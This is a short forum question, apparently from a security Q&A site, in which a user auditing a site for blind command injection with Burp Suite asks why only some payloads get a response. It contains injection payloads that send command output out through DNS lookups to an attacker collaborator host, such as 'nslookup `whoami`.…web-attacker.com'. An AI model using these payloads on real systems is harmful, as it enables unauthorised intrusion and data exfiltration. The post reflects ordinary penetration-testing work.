• caglararli@hotmail.com
  • 05386281520

Command Injection Issues [closed]

Çağlar Arlı      -    47 Views

Command Injection Issues [closed]

I am auditing a site with blind injection of commands from the burp suite repeater, the problem is that only the following command responds to me in the following way

nslookup kgji2ohoyw.web-attacker.com

The burpsuite collaborator receives the response successfully, but when trying something else like a ping or whoami for example:

nslookup `whoami`.kgji2ohoyw.web-attacker.com

ping -c 10 127.0.0.1

it does not receive a response